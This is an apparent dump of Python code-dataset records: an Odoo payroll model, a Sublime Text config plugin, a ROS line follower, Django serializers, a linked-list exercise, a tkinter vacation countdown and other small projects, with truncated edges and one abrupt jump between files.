{question_with_path}{explanation}. Available: {available_keys}\"\n            )\n\n    def validate(self, expression):\n        return super().validate(expression, QuestionValidatingAnalyzer)\n","sub_path":"caluma/form/jexl.py","file_name":"jexl.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"287035","text":"from pytz import timezone\nfrom datetime import date, datetime, time\n\nfrom odoo import api, fields, models, tools, _\nfrom odoo.addons import decimal_precision as dp\nfrom odoo.exceptions import UserError, ValidationError\n\n\nclass HrPayslip(models.Model):\n    _inherit = 'hr.payslip'\n    _description = 'Pay Slip'\n    \n    indicadores_id = fields.Many2one('hr.indicadores', string='Indicadores',\n        readonly=True, states={'draft': [('readonly', False)]},\n        help='Defines Previred Forecast Indicators')\n    movimientos_personal = fields.Selection((('0', 'Sin Movimiento en el Mes'),\n                                              ('1', 'Contratación a plazo indefinido'),\n                                              ('2', 'Retiro'),\n                                              ('3', 'Subsidios (L Médicas)'),\n                                              ('4', 'Permiso Sin Goce de Sueldos'),\n                                              ('5', 'Incorporación en el Lugar de Trabajo'),\n                                              ('6', 'Accidentes del Trabajo'),\n                                              ('7', 'Contratación a plazo fijo'),\n                                              ('8', 'Cambio Contrato plazo fijo a plazo indefinido'),\n                                              ('11', 'Otros Movimientos (Ausentismos)'),\n                                              ('12', 'Reliquidación, Premio, Bono') \n                                              ), 'Código Movimiento', default=\"0\")\n\n    date_start_mp = fields.Date('Fecha Inicio MP', help=\"Fecha de inicio del movimiento de personal\")\n    date_end_mp = fields.Date('Fecha Fin MP', help=\"Fecha del fin del movimiento de personal\")\n\n    @api.model\n    def create(self, vals):\n        if 'indicadores_id' in self.env.context:\n            vals['indicadores_id'] = self.env.context.get('indicadores_id')\n        if 'movimientos_personal' in self.env.context:\n            vals['movimientos_personal'] = self.env.context.get('movimientos_personal')\n        return super(HrPayslip, self).create(vals)\n\n    @api.model\n    def get_worked_day_lines(self, contracts, date_from, date_to):\n        res = super(HrPayslip, self).get_worked_day_lines(contracts, date_from, date_to)\n        temp = 0 \n        dias = 0\n        attendances = {}\n        leaves = []\n        for line in res:\n            if line.get('code') == 'WORK100':\n                attendances = line\n            else:\n                leaves.append(line)\n        for leave in leaves:\n            temp += leave.get('number_of_days') or 0\n        #Actual days worked, used to compute the \"semana corrida\" (paid week)\n        effective = attendances.copy()\n        effective.update({\n            'name': _(\"Dias de trabajo efectivos\"),\n            'sequence': 2,\n            'code': 'EFF100',\n        })\n        # If fewer than 5 days were worked we take the days actually worked; in every other case, 30 days minus the absences\n        # These cases can always be adjusted manually, directly on the payslip.\n        # Originally this value was derived from the number of days in the month, not from 30 days\n        # TODO we should skip vacations, i.e. vacations must not subtract worked days. 
\n if (effective.get('number_of_days') or 0) < 5:\n dias = effective.get('number_of_days')\n else:\n dias = 30 - temp\n attendances['number_of_days'] = dias\n res = []\n res.append(attendances)\n res.append(effective)\n res.extend(leaves)\n return res\n\n\nclass HrRuleInput(models.Model):\n _name = 'hr.rule.input'\n _description = 'Salary Rule Input'\n\n name = fields.Char(string='Descripcion', required=True)\n code = fields.Char(required=True, help=\"The code that can be used in the salary rules\")\n input_id = fields.Many2one('hr.salary.rule', string='Salary Rule Input', required=True)\n\n\nclass HrPayslipLine(models.Model):\n _inherit = 'hr.payslip.line'\n\n register_id = fields.Many2one('hr.contribution.register', string='Registro de contribución',\n help=\"Eventual third party involved in the salary payment of the employees.\")\n\n\nclass HrPayslipEmployees(models.TransientModel):\n _inherit = 'hr.payslip.employees'\n\n\n def compute_sheet(self):\n indicadores_id = False\n if self.env.context.get('active_id'):\n indicadores_id = self.env['hr.payslip.run'].browse(self.env.context.get('active_id')).indicadores_id.id\n return super(HrPayslipEmployees, self.with_context(indicadores_id=indicadores_id)).compute_sheet()\n\nfrom odoo import api, fields, models, tools, _\n\n\nclass HrPayslipRun(models.Model):\n _inherit = 'hr.payslip.run'\n _description = 'Payslip Run'\n\n indicadores_id = fields.Many2one('hr.indicadores', 'Indicadores', states={'draft': [('readonly', False)]}, readonly=True, required=True)\n movimientos_personal = fields.Selection((('0', 'Sin Movimiento en el Mes'),\n ('1', 'Contratación a plazo indefinido'),\n ('2', 'Retiro'),\n ('3', 'Subsidios (L Médicas)'),\n ('4', 'Permiso Sin Goce de Sueldos'),\n ('5', 'Incorporación en el Lugar de Trabajo'),\n ('6', 'Accidentes del Trabajo'),\n ('7', 'Contratación a plazo fijo'),\n ('8', 'Cambio Contrato plazo fijo a plazo indefinido'),\n ('11', 'Otros Movimientos (Ausentismos)'),\n ('12', 'Reliquidación, Premio, Bono') \n ), 'Movimientos Personal', default=\"0\")","sub_path":"opens_hr/models/hr_payslip.py","file_name":"hr_payslip.py","file_ext":"py","file_size_in_byte":5016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"212621472","text":"import sys\nimport pygame\nimport time\n\npygame.init()\nwin = pygame.display.set_mode((1200, 800))\n\n\ngreen = (0, 200, 0)\nwhite = (255, 255, 255)\n\ndef loadimages():\n image1 = pygame.image.load(\"drum.png\")\n win.blit(image1, (200, 100))\n image2 = pygame.image.load(\"guitarlogo.jpg\")\n win.blit(image2, (500, 100))\n image3 = pygame.image.load(\"cymbals.jpg\")\n win.blit(image3, (800, 100))\n image4 = pygame.image.load(\"trumpet.jpg\")\n win.blit(image4, (200, 500))\n image5 = pygame.image.load(\"clap.png\")\n win.blit(image5, (500, 500))\n image6 = pygame.image.load(\"piano.jpg\")\n win.blit(image6, (800, 500))\n\ndef progloop(run):\n while(run == True):\n loadimages()\n cursor = pygame.mouse.get_pos()\n press = pygame.mouse.get_pressed()\n pygame.display.update()\n \n if(200\n# @param folders: list of paths to folders to search in\n#\n# @return config filepath\ndef guessConfigFile(folders):\n for folder in folders:\n config = getConfigFile(folder)\n if config is not None:\n return config\n\n for folder in os.walk(folder):\n config = getConfigFile(folder[0])\n if config is not None:\n return config\n\n return None\n# Returns configuration file for a given file\n#\n# @type file_path: string\n# @param file_path: file_path to the file 
for which we try to find a config\n#\n# @return file path to the config file or None\n#\n# @global configs\ndef getConfigFile(file_path):\n cacheKey = file_path\n if isString(cacheKey) is False:\n cacheKey = cacheKey.decode('utf-8')\n\n # try cached\n try:\n if configs[cacheKey] and os.path.exists(configs[cacheKey]) and os.path.getsize(configs[cacheKey]) > 0:\n # printMessage(\"Loading config: cache hit (key: \" + cacheKey + \")\")\n \n return configs[cacheKey]\n else:\n raise KeyError\n\n # cache miss\n except KeyError:\n try:\n folders = getFolders(file_path)\n\n if folders is None or len(folders) == 0:\n return None\n\n configFolder = findConfigFile(folders)\n\n if configFolder is None:\n # printMessage(\"Found no config for {\" + cacheKey + \"}\", None, True)\n return None\n\n config = os.path.join(configFolder, configName)\n configs[cacheKey] = config\n\n return config\n\n except AttributeError:\n return None\n# Finds a config file in given folders\n#\n# @type folders: list\n# @param folders: list of paths to folders to filter\n#\n# @return list of file paths\n#\n# @global configName\ndef findConfigFile(folders):\n return findFile(folders, configName)\ndef getProjectRoot():\n if hasActiveView() is False:\n file_path = os.path.dirname(guessConfigFile(sublime.active_window().folders()))\n \n else :\n file_path = os.path.dirname(sublime.active_window().active_view().file_name())\n temp = getConfigFile(file_path)\n if temp is None:\n return temp\n return os.path.dirname(getConfigFile(file_path))\n \n\n# Returns path of file from its config file\n#\n# @type file_path: string\n# @param file_path: file path to the file of which we want the hash\n#\n# @return string file path from settings root\ndef getRootPath(file_path, prefix = ''):\n return prefix + os.path.relpath(file_path, os.path.dirname(getConfigFile(file_path))).replace('\\\\', '/')\n\n\n# Returns a file path associated with view\n#\n# @type file_path: string\n# @param file_path: file path to the file of which we want the hash\n#\n# @return string file path\ndef getFileName(view):\n return view.file_name()\n\ndef verifyConfig(config):\n if type(config) is not dict:\n return \"Config is not a {dict} type\"\n keys = ['action','action_on_save']\n for key in keys:\n if key not in config:\n return \"Config is missing a {\" + key + \"} key\"\n if config['action'] is not None and isString(config['action']) is False:\n return \"Config entry 'action' must be null or string, \" + str(type(config['action'])) + \" given\"\n # if config['version'] is not None and isString(config['version']) is False:\n # return \"Config entry 'version' must be null or string, \" + str(type(config['version'])) + \" given\"\n return True\n# Finds a real file path among given folder paths\n# and returns the path or None\n#\n# @type folders: list\n# @param folders: list of paths to folders to look into\n# @type file_name: string\n# @param file_name: file name to search\n#\n# @return string file path or None\ndef findFile(folders, file_name):\n if folders is None:\n return None\n\n for folder in folders:\n if isString(folder) is False:\n folder = folder.decode('utf-8')\n\n if os.path.exists(os.path.join(folder, file_name)) is True:\n return folder\n\n return None\ndef isString(var):\n var_type = type(var)\n\n if sys.version[0] == '3':\n return var_type is str or var_type is bytes\n else:\n return var_type is str or var_type is unicode\n# Get all folders paths from given path upwards\n#\n# @type file_path: string\n# @param file_path: absolute file path to return the 
paths from\n#\n# @return list of file paths\n#\n# @global nestingLimit\ndef getFolders(file_path):\n    if file_path is None:\n        return []\n\n    folders = [file_path]\n    limit = nestingLimit\n\n    while True:\n        split = os.path.split(file_path)\n\n        # nothing found\n        if len(split) == 0:\n            break\n\n        # get filepath\n        file_path = split[0]\n        limit -= 1\n\n        # nothing else remains\n        if len(split[1]) == 0 or limit < 0:\n            break\n\n        folders.append(split[0])\n\n    return folders\n# Prints a special message to console and optionally to status bar\n#\n# @type text: string\n# @param text: message to status bar\n# @type name: string|None\n# @param name: comma-separated list of connections or other auxiliary info\n# @type onlyVerbose: boolean\n# @param onlyVerbose: print only if config has debug_verbose enabled\n# @type status: boolean\n# @param status: show in status bar as well = true\n#\n# @global isDebug\n# @global isDebugVerbose\ndef printMessage(text, name=None, onlyVerbose=False, status=False):\n    message = \"Formax_Sublime\"\n\n    if name is not None:\n        message += \" [\" + name + \"]\"\n\n    message += \" > \"\n    message += text\n\n    if isDebug and (onlyVerbose is False or isDebugVerbose is True):\n        # print (message.encode('utf-8'))\n        print (message)\n\n    if status:\n        dumpMessage(message)\n# Issues a system notification for a certain event\n#\n# @type text: string\n# @param text: notification message\ndef systemNotify(text):\n    try:\n        import subprocess\n\n        text = \"Formax_Sublime > \" + text\n\n        if sys.platform == \"darwin\":\n            \"\"\" Run Growl notification \"\"\"\n            cmd = '/usr/local/bin/growlnotify -a \"Sublime Text 3\" -t \"FTPSync message\" -m \"'+text+'\"'\n            subprocess.call(cmd,shell=True)\n        elif sys.platform == \"linux2\":\n            subprocess.call('/usr/bin/notify-send \"Sublime Text 3\" \"'+text+'\"',shell=True)\n        elif sys.platform == \"win32\":\n            \"\"\" Find the notification platform for Windows if there is one \"\"\"\n\n    except Exception as e:\n        printMessage(\"Notification failed\")\n        handleException(e)\n# Schedules a single message to be logged/shown\n#\n# @type text: string\n# @param text: message to status bar\n#\n# @global messageTimeout\ndef dumpMessage(text):\n    sublime.set_timeout(lambda: statusMessage(text), messageTimeout)\n\n# Parses given config and adds default values to each connection entry\n#\n# @type file_path: string\n# @param file_path: file path to the file of which we want the hash\n#\n# @return config dict or None\n#\n# @global isLoaded\n# @global coreConfig\n# @global projectDefaults\ndef loadConfig(file_path):\n\n    if isLoaded is False:\n        printMessage(\"FTPSync is not loaded (just installed?), please restart Sublime Text\")\n        return None\n\n    if isString(file_path) is False:\n        printMessage(\"LoadConfig expects string, \" + str(type(file_path)) + \" given\")\n        return None\n\n    if os.path.exists(file_path) is False:\n        return None\n\n    # parse config\n    try:\n        config = parseJson(file_path)\n    except Exception as e:\n        printMessage(\"Failed parsing configuration file: {\" + file_path + \"} (commas problem?) 
[Exception: \" + stringifyException(e) + \"]\", status=True)\n handleException(e)\n return None\n\n result = {}\n\n # merge with defaults and check\n for name in config:\n if type(config[name]) is not dict:\n printMessage(\"Failed using configuration: contents are not dictionaries but values\", status=True)\n return None\n\n result[name] = dict(list(projectDefaults.items()) + list(config[name].items()))\n result[name]['file_path'] = file_path\n\n # fix path\n if len(result[name]['path']) > 1 and result[name]['path'][-1] != \"/\":\n result[name]['path'] = result[name]['path'] + \"/\"\n\n # merge nested\n for index in nested:\n list1 = list(list(projectDefaults.items())[index][1].items())\n list2 = list(result[name][list(projectDefaults.items())[index][0]].items())\n\n result[name][list(projectDefaults.items())[index][0]] = dict(list1 + list2)\n try:\n if result[name]['debug_extras']['dump_config_load'] is True:\n print(result[name])\n except KeyError:\n pass\n\n # add passwords\n if file_path in passwords and name in passwords[file_path] and passwords[file_path][name] is not None:\n result[name]['password'] = passwords[file_path][name]\n\n result[name] = updateConfig(result[name])\n\n verification_result = verifyConfig(result[name])\n\n if verification_result is not True:\n printMessage(\"Invalid configuration loaded: <\" + str(verification_result) + \">\", status=True)\n\n # merge with generics\n final = dict(list(coreConfig.items()) + list({\"connections\": result}.items()))\n\n # override by overridingConfig\n if file_path in overridingConfig:\n for name in overridingConfig[file_path]['connections']:\n if name in final['connections']:\n for item in overridingConfig[file_path]['connections'][name]:\n final['connections'][name][item] = overridingConfig[file_path]['connections'][name][item]\n\n return final\n# Parses JSON-type file with comments stripped out (not part of a proper JSON, see http://json.org/)\n#\n# @type file_path: string\n#\n# @return dict|None\n#\n# @global removeLineComment\ndef parseJson(file_path):\n attempts = 3\n succeeded = False\n\n while attempts > 0:\n attempts = attempts - 1\n try:\n json = parseJsonInternal(file_path)\n if debugJson:\n printMessage(\"Type returned: \" + str(type(json)))\n printMessage(\"Is empty: \" + str(bool(json)))\n\n succeeded = type(json) is dict and bool(json) is True\n break\n except Exception as e:\n handleException(e)\n printMessage(\"Retrying reading config... 
(remaining \" + str(attempts) + \")\")\n sleep(0.1)\n\n if succeeded:\n return json\n else:\n printMessage(\"Failed to read settings from file: \" + str(file_path))\n return {}\n\n# Parses JSON-type file with comments stripped out (not part of a proper JSON, see http://json.org/)\n#\n# @type file_path: string\n#\n# @return dict\n#\n# @global removeLineComment\ndef parseJsonInternal(file_path):\n if isString(file_path) is False:\n raise Exception(\"Expected filepath as string, \" + str(type(file_path)) + \" given\")\n\n if os.path.exists(file_path) is False:\n raise IOError(\"File \" + str(file_path) + \" does not exist\")\n\n if os.path.getsize(file_path) == 0:\n raise IOError(\"File \" + str(file_path) + \" is empty\")\n\n contents = \"\"\n\n try:\n file = open(file_path, 'r')\n\n for line in file:\n contents += removeLineComment.sub('', line).strip()\n finally:\n file.close()\n\n decoder = json.JSONDecoder()\n\n if debugJson:\n printMessage(\"Debug JSON:\")\n print (\"=\"*86)\n print (contents)\n print (\"=\"*86)\n\n if len(contents) > 0:\n return decoder.decode(contents)\n else:\n raise IOError('Content read from ' + str(file_path) + ' is empty')\n# Safer print of exception message\ndef stringifyException(exception):\n return str(exception)\n# Dumps the exception to console\ndef handleException(exception):\n print (\"Formax_Sublime > Exception in user code:\")\n print ('-' * 60)\n traceback.print_exc(file=sys.stdout)\n print ('-' * 60)\n\ndef statusMessage(text):\n sublime.status_message(text)\n","sub_path":"formax_psync.py","file_name":"formax_psync.py","file_ext":"py","file_size_in_byte":15392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"526062489","text":"#!/usr/bin/env python\nimport rospy\nimport cv2\nimport numpy as np\nimport math\nfrom os import path\nfrom cv_bridge import CvBridge, CvBridgeError\nfrom sensor_msgs.msg import Image\nfrom ackermann_msgs.msg import AckermannDriveStamped, AckermannDrive\nfrom move_robot import MoveRosBots\nfrom geometry_msgs.msg import Twist\n\ndef callback(x):\n pass\n\nclass LineFollower(object):\n\n def __init__(self):\n \n self.bridge_object = CvBridge()\n self.datapath = \"/home/michaelji/tritonai/catkin_ws/src/ocvfiltercar/data/records_1/\"\n\n #self.image_sub = rospy.Subscriber(\"/robot1/camera1/image_raw\",Image,self.camera_callback)\n self.image_sub = rospy.Subscriber(\"/image\", Image, self.camera_callback)\n self.drive_pub = rospy.Publisher('/drive', AckermannDriveStamped, queue_size=10)\n\n self.moverosbots_object = MoveRosBots()\n\n def camera_callback(self,data):\n\n # HSV filter for isolating all lines\n bestfilter = {\n \"lowH\": 16,\n \"highH\": 43,\n \"lowS\": 51,\n \"highS\": 140,\n \"lowV\": 42,\n \"highV\": 213\n }\n # RGB for mask to isolate yellow center line\n rgbcenterfilter = {\n \"lowR\": 200,\n \"highR\": 255,\n \"lowG\": 100,\n \"highG\": 255,\n \"lowB\": 100,\n \"highB\": 170\n }\n # RGB for mask to isolate white borders\n rgbsidefilter = {\n \"lowR\": 200,\n \"highR\": 255,\n \"lowG\": 200,\n \"highG\": 255,\n \"lowB\": 200,\n \"highB\": 255\n }\n\n # Load filter values\n lowR = rgbcenterfilter.get(\"lowR\")\n highR = rgbcenterfilter.get(\"highR\")\n lowG = rgbcenterfilter.get(\"lowG\")\n highG = rgbcenterfilter.get(\"highG\")\n lowB = rgbcenterfilter.get(\"lowB\")\n highB = rgbcenterfilter.get(\"highB\")\n\n # Filter experimentation\n \"\"\"\n cv2.namedWindow('sliders')\n\n cv2.createTrackbar('lowR', 'sliders', lowR, 255, callback)\n 
cv2.createTrackbar('highR', 'sliders', highR, 255, callback)\n\n cv2.createTrackbar('lowG', 'sliders', lowG, 255, callback)\n cv2.createTrackbar('highG', 'sliders', highG, 255, callback)\n\n cv2.createTrackbar('lowB', 'sliders', lowB, 255, callback)\n cv2.createTrackbar('highB', 'sliders', highB, 255, callback)\n \"\"\"\n\n i = 0 \n #while path.exists(self.datapath + \"img_\" + str(i) + \".jpg\"):\n while True:\n cv_image = cv2.imread(self.datapath + \"img_\" + str(i) + \".jpg\")\n #print(data)\n \"\"\"\n try:\n # We select bgr8 because its the OpneCV encoding by default\n cv_image = self.bridge_object.imgmsg_to_cv2(data, \"bgr8\")\n except CvBridgeError as e:\n print(e)\n exit(1)\n \"\"\"\n height, width, channels = cv_image.shape\n crop_img = cv_image[int(height/2):height, 0:width]\n\n # Set mask values\n \"\"\"\n lowR = cv2.getTrackbarPos('lowR', 'sliders')\n highR = cv2.getTrackbarPos('highR', 'sliders')\n lowG = cv2.getTrackbarPos('lowG', 'sliders')\n highG = cv2.getTrackbarPos('highG', 'sliders')\n lowB = cv2.getTrackbarPos('lowB', 'sliders')\n highB = cv2.getTrackbarPos('highB', 'sliders')\n \"\"\"\n rgb = cv2.cvtColor(crop_img, cv2.COLOR_BGR2RGB)\n\n lower = np.array([lowR, lowG, lowB])\n higher = np.array([highR, highG, highB])\n mask = cv2.inRange(rgb, lower, higher)\n\n # Display images\n \"\"\"\n cv2.imshow('cv_image', cv_image)\n cv2.imshow('crop_img', crop_img)\n cv2.imshow('mask', mask)\n # Clean monitor positions\n cv2.moveWindow(\"mask\", 0,900);\n cv2.moveWindow(\"crop_img\", 0,400);\n cv2.moveWindow(\"cv_image\", 0,700);\n \"\"\"\n\n # Calculate c_x, c_y\n # Center Line:\n # Calculate centroid of the blob of binary image using ImageMoments\n m = cv2.moments(mask, False)\n try:\n cx, cy = m['m10']/m['m00'], m['m01']/m['m00']\n except ZeroDivisionError:\n cy, cx = height/2, width/2\n\n # Draw Circle on resultant cropped image\n \"\"\"\n result =cv2.bitwise_and(crop_img,crop_img, mask = mask)\n cv2.circle(result,(int(cx), int(cy)), 5,(0,0,255),-1)\n cv2.imshow('result', result)\n cv2.moveWindow('result', 400, 0)\n \"\"\"\n\n error_x = cx - width / 2;\n angular_z = -error_x / 100;\n\n # ROS Message publish\n a = AckermannDriveStamped()\n\n a.drive.steering_angle = angular_z\n a.drive.speed = 2 / (1 + math.exp(abs(4 * angular_z)))\n\n rospy.loginfo(\"ANGULAR VALUE: \" + str(a.drive.steering_angle))\n rospy.loginfo(\"SPEED VALUE: \" + str(a.drive.speed))\n #twist_object.linear.x = 0.2;\n #twist_object.angular.z = -error_x / 100;\n\n # SIDES\n # Use gradients to determine steering\n # Load filter values\n \"\"\"\n lowR = rgbsidefilter.get(\"lowR\")\n highR = rgbsidefilter.get(\"highR\")\n lowG = rgbsidefilter.get(\"lowG\")\n highG = rgbsidefilter.get(\"highG\")\n lowB = rgbsidefilter.get(\"lowB\")\n highB = rgbsidefilter.get(\"highB\")\n\n border_lower = np.array([lowR, lowG, lowB])\n border_higher = np.array([highR, highG, highB])\n border_mask = cv2.inRange(rgb, border_lower, border_higher)\n grad_x = np.diff(border_mask, n = 1, axis = 0)\n all_indices = [[]]\n print(grad_x)\n for row in grad_x:\n indices = []\n for index in range(len(row)):\n if row[index] != 0:\n print(str(index) + \" \", end='')\n np.append(indices, index)\n\n if len(indices) == 2:\n np.append(all_indices, indices)\n\n print(all_indices)\n print(np.mean(np.diff(all_indices, axis = 0), axis = 0))\n\n cv2.imshow('gradx', grad_x)\n cv2.moveWindow('gradx', 400, 600)\n \"\"\"\n i += 1\n \n \n key = cv2.waitKey(50) & 0xFF\n if key == ord('q'):\n exit(0)\n\n return\n \n def clean_up(self):\n 
self.moverosbots_object.clean_class()\n cv2.destroyAllWindows()\n \n \n\ndef main():\n rospy.init_node('line_following_node', anonymous=True)\n \n line_follower_object = LineFollower()\n \n line_follower_object.camera_callback(3)\n\n rate = rospy.Rate(5)\n ctrl_c = False\n def shutdownhook():\n # works better than the rospy.is_shut_down()\n line_follower_object.clean_up()\n rospy.loginfo(\"shutdown time!\")\n ctrl_c = True\n \n rospy.on_shutdown(shutdownhook)\n \n while not ctrl_c:\n rate.sleep()\n \n \nif __name__ == '__main__':\n main()","sub_path":"ocvfiltercar/scripts/filter_follow_exp.py","file_name":"filter_follow_exp.py","file_ext":"py","file_size_in_byte":7215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"224446138","text":"from rest_framework import serializers\n\nfrom .. import models\n\n\nclass UserSerializer(serializers.ModelSerializer):\n class Meta:\n model = models.User\n fields = ('username', 'first_name', 'last_name', 'phone')\n read_only_fields = fields\n\n\nclass ServiceSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = models.Service\n fields = (\n 'id',\n 'name',\n 'description',\n 'price',\n 'benefit_short',\n 'benefit_long',\n 'eula_url',\n 'img_logo_url',\n 'img_service_url',\n )\n read_only_fields = fields\n\n\nclass SensorAttributeSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = models.SensorAttribute\n fields = ('uri', 'description', 'ui_type')\n read_only_fields = fields\n\n\nclass SensorSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = models.Sensor\n fields = ('id', 'name', 'description', 'provides')\n read_only_fields = fields\n\n\nclass BasicSensorSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = models.Sensor\n fields = ('id', 'name', 'description')\n read_only_fields = fields\n\n\nclass ApartmentSensorValueSerializer(serializers.ModelSerializer):\n description = serializers.CharField(source='attribute.description')\n uri = serializers.CharField(source='attribute.uri')\n ui_type = serializers.CharField(source='attribute.ui_type')\n sensor = serializers.IntegerField(source='apartment_sensor.sensor_id')\n\n class Meta:\n model = models.ApartmentSensorValue\n fields = ('sensor', 'value', 'updated_at', 'description', 'uri', 'ui_type')\n\n\nclass ApartmentSensorSerializer(serializers.ModelSerializer):\n apartment_sensor_values = ApartmentSensorValueSerializer(many=True, read_only=True)\n sensor = BasicSensorSerializer()\n\n class Meta:\n model = models.ApartmentSensor\n fields = ('id', 'apartment_sensor_values', 'identifier', 'sensor')\n\n\nclass ApartmentSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = models.Apartment\n fields = ('id', 'street', 'city', 'postal_code', 'apartment_sensors')\n read_only_fields = fields\n\n\nclass SubscriptionSerializer(serializers.HyperlinkedModelSerializer):\n service = ServiceSerializer()\n\n class Meta:\n model = models.Subscription\n fields = ('id', 'created_at', 'updated_at', 'service')\n","sub_path":"backend/core/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"503060215","text":"\"\"\"\nGiven a non-empty, singly linked list with head node head, return a middle node of linked list.\n\nIf there are two middle nodes, return the second middle node.\n\n \n\nExample 1:\n\nInput: [1,2,3,4,5]\nOutput: 
Node 3 from this list (Serialization: [3,4,5])\nThe returned node has value 3.  (The judge's serialization of this node is [3,4,5]).\nNote that we returned a ListNode object ans, such that:\nans.val = 3, ans.next.val = 4, ans.next.next.val = 5, and ans.next.next.next = NULL.\nExample 2:\n\nInput: [1,2,3,4,5,6]\nOutput: Node 4 from this list (Serialization: [4,5,6])\nSince the list has two middle nodes with values 3 and 4, we return the second one.\n \n\nNote:\n\nThe number of nodes in the given list will be between 1 and 100.\n\nReference: \n\thttps://www.geeksforgeeks.org/write-a-c-function-to-print-the-middle-of-the-linked-list/\n\thttps://practice.geeksforgeeks.org/problems/finding-middle-element-in-a-linked-list/1\t\n\nMethod 1:\n\tTraverse the whole linked list and count the no. of nodes. Now traverse the list again till count/2 and return the node at count/2.\n\nMethod 2:\nTraverse linked list using two pointers. Move one pointer by one and the other pointer by two. When the fast pointer reaches the end, the slow pointer will be at the middle of the linked list.\n\nThe GeeksforGeeks reference above illustrates step by step how the two-pointer version works.\n\"\"\"\n\n# Python3 program to find the middle node of a singly linked list\n# findMid() uses Method 1: count the nodes, then walk count/2 steps from the head\ndef findMid(head):\n\tcount = 1\n\ttemp = head\n\twhile(temp.next):\n\t\ttemp = temp.next\n\t\tcount = count + 1\n\t#Traverse the list again till count/2 and return the node at count/2.\n\ttemptwo = head\n\tfor i in range(int(count/2)):\n\t\ttemptwo = temptwo.next \n\t\n\treturn temptwo\n\t\n#Driver Code Starts\n#Node Class\nclass node:\n\tdef __init__(self, val):\n\t\tself.data = val\n\t\tself.next = None \n\t\n#Linked List Class \nclass Linked_List:\n\tdef __init__(self):\n\t\tself.head = None\n\t\t\n\tdef insert(self, val):\n\t\tif self.head == None:\n\t\t\tself.head = node(val)\n\t\telse:\n\t\t\tnew_node = node(val)\n\t\t\ttemp = self.head\n\t\t\twhile(temp.next):\n\t\t\t\ttemp = temp.next\n\t\t\ttemp.next = new_node\n\t\ndef createList(arr, n):\n\tlis = Linked_List()\n\tfor i in range(n):\n\t\tlis.insert(arr[i])\n\treturn lis.head\n\nif __name__ == '__main__':\n\tt = int(input()) \n\tfor i in range(t):\n\t\tn = int(input())\n\t\tarr = list(map(int, input().strip().split()))\n\t\thead = createList(arr, n)\n\t\tprint(findMid(head).data)\n\t\t\n","sub_path":"30-day-leetcoding-challenge/Week 2/MiddleoftheLinkedList.py","file_name":"MiddleoftheLinkedList.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"430635062","text":"import QBH_dtw as dtw\nimport string\n\n# Process a single file\nnoteList = dtw.readFile('00029.txt')\nnumberList = dtw.string2number(noteList)\nsmoothList = dtw.smooth(numberList)\ninterList = dtw.inter4list(smoothList)\n\nprint(interList)\n\n","sub_path":"src/demo/processSingleFile.py","file_name":"processSingleFile.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"330597371","text":"#Creating a window using tkinter\nfrom tkinter import *\nfrom tkinter import simpledialog\nfrom tkinter import ttk\nfrom math import *\nfrom tkinter.messagebox import *\nfrom datetime import date\nfrom tkinter.font import Font\nimport tkinter as tk\nimport datetime\nimport pytz\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\nfrom matplotlib.figure import Figure\nimport json\n\n\n\n\n\n\n\nroot = 
Tk()\nroot.geometry(\"1200x950\")\nframe = Frame(root)\nframe.pack()\n\nleftframe = Frame(root)\nleftframe.pack(side=LEFT)\n \nrightframe = Frame(root)\nrightframe.pack(side=RIGHT)\n\ntopframe = Frame(root)\ntopframe.pack(side=TOP)\n\n\n\n#create tabs\ntabControl = ttk.Notebook(root) \n\ntab1 = ttk.Frame(tabControl) \ntab2 = ttk.Frame(tabControl)\ntab3 = ttk.Frame(tabControl)\n\ntabControl.add(tab1, text ='Mainpage') \ntabControl.add(tab2, text ='Budget') \ntabControl.add(tab3, text ='Address Book') \n\ntabControl.pack(expand = 1, fill =\"both\") \n\n#datetime\n\n#Countdown to your vacation\n\ndef countdown():\n fmt1 = '%D'\n current_date=datetime.datetime.now()\n year, month, day=map(int,blank3.get().split(','))\n vacation_day=datetime.datetime(year,month,day)\n countdown_days=(vacation_day-current_date)\n countdown_days_formated=countdown_days.days\n blank4.insert(0, countdown_days_formated)\n\n\nLabel(tab1, text=\"What day is your vacation. Enter in form YYYY,MM,DD\").pack(side=TOP, pady=10)\nblank3=Entry(tab1)\nblank3.pack(side=TOP)\n\nbutton = Button(tab1, text=\"Countdown\", command=countdown)\nbutton.pack(side=TOP, padx=5)\n\nLabel(tab1, text=\"Number of Days until your vacation: \").pack(side=TOP, pady=10)\n\nblank4=Entry(tab1)\nblank4.pack(side=TOP)\n\n#Converting from your current time zone to Japanese time Zone\nLabel(tab1,text=\"Please choose your current timezone\").pack(side=LEFT, padx=5, pady=20)\n\n\nOPTIONS = [\n'US/Eastern',\n'America/Chicago',\n'America/Los_Angeles'\n] #etc\n\n\n\nvariable = StringVar(tab1)\nvariable.set(OPTIONS[0]) # default value\n\nw = OptionMenu(tab1, variable, *OPTIONS)\nw.pack(side=LEFT, padx=5)\n\nnow_utc = datetime.datetime.utcnow().replace(tzinfo=pytz.utc)\n\ndef ok():\n fmt = '%H:%M'\n \n source_time_zone = pytz.timezone(variable.get())\n local_time = source_time_zone.normalize(now_utc.astimezone(source_time_zone))\n local_time_formatted=local_time.strftime(fmt)\n blank2.insert(0, local_time_formatted)\n\n Japan_timezone = pytz.timezone('Japan')\n Japan_local_time = Japan_timezone.normalize(now_utc.astimezone(Japan_timezone))\n \n \n Japan_local_time_formatted=Japan_local_time.strftime(fmt)\n blank1.insert(0, 